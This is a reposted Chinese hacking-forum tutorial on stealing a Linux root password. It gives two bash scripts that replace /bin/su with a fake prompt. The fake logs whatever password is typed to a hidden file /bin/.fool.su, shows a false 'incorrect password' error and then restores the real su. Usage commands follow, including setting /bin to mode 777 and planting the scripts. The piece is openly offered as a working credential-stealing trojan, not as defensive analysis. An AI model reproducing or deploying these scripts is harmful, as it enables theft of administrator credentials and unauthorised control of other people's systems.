会员投稿
投稿指南转一个截取root密码的脚本。貌似写的还不错
日期:2010-10-10
点击:351
来源: 未知
今天大家來做一個簡單的.....
如何偷su密碼的shell script. ......
有密碼能使鬼推磨....沒有密碼被root折磨.......
俗話說有加密的密碼最難懂.....
要如何輕鬆取得super user密碼.....
就要動點頭腦.....
假設先取得root 權限但不知道密碼......
我們想要取得root的密碼......
可以這樣做一個假的 su .....
底下需要2個shell script檔案......
1.setkey.sh
2.keysu.sh
#把它存成 setkey.sh
#
#這是一個設定偽裝su檔
#要用之前先備份 su 成 su.old
#!/bin/bash #呼叫系統的 bash script
mv /bin/su /bin/su.old #把su 檔更名為 su.old
mv /bin/keysu.sh /bin/su #把keysu.sh 檔更名為 su
#把它存成 keysu.sh
#
#這是一個偽裝的 su 用來偷密碼的
#!/bin/bash #呼叫系統的 bash script
read -p "Password:" -ers keyin #讀取鍵盤的輸入值
echo $keyin >>/bin/.fool.su #輸出到/bin/.fool.su 文件底下
echo "" #跳行
echo "su: incorrect passowrd" #輸出一個錯誤訊息讓su以為密碼錯誤
echo "##########" >>/bin/.fool.su #輸出#用來隔開密碼
#用完就可以復原 su 了
mv /bin/su /bin/keysu.sh #把su 檔更名為 keysu.sh
mv /bin/su.old /bin/su #把su.old 檔更名為 su
bash #bash用來模擬輸出密碼時會頓一下
說明使用方法.....
先以root 權限執行.....
[ root @ localhost fool ]$ chmod 777 /bin #/bin 開權限777
[ root @ localhost fool ]$ cp -r -f setkey.sh /bin #放到目錄/bin底下
[ root @ localhost fool ]$ cp -r -f keysu.sh /bin #放到目錄/bin底下
[ root @ localhost fool ]$ cd /bin #進入根目錄
[ root @ localhost fool ]$ cp -r -f su su.bak #先備份su檔
[ root @ localhost fool ]$ chmod 777 setkey.sh #開權限777
[ root @ localhost fool ]$ chmod 777 keysu.sh #開權限777
[ root @ localhost fool ]$ chmod 777 su #開權限777
[ root @ localhost fool ]$ exit #跳出root權限
[ NYbie @ localhost fool ]$ setkey.sh #開始偽裝su
開始等待ing使用者su.....
等了好久..... 直到有一天使用者kid想要su.....
當一使用者想要 su 就會得到密碼了......
測試一下ok.....
密碼放在/bin/.fool.su....
改天在來拿......
這樣就可輕鬆拿到su密碼....
不用解shadow......
Tags: 截取root密码
相关文章列表:
推荐内容
最新文章
- linux下nmap的使用-linux网络扫描技术
- dedecms 5.5 0day 转载
- PHP推荐禁用函数disable_functions PHP安全配置
- Aspcms 1.5 COOKIES注入0day
- (CentOS+Nginx+PHP+Mysql)配置和WEB服务器安全配置
- espcms最新注入0day
- emseasy最新注入漏洞
- 史上最全的各个脚本的一句话木马
- Linux 递归经典:fork 炸弹
- phpcms 2008最新0day加批量EXP代码 2011年11月
- SiteServer 3.4.4最新SQL注入0day
- ECSHOP 2.7.2最新盲注漏洞
- C语言之父丹尼斯·里奇也登船了
- 微软WP7手机系统摄像头非法跟踪用户坐标
- 黑客称德国绿坝时时监控网络用户
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史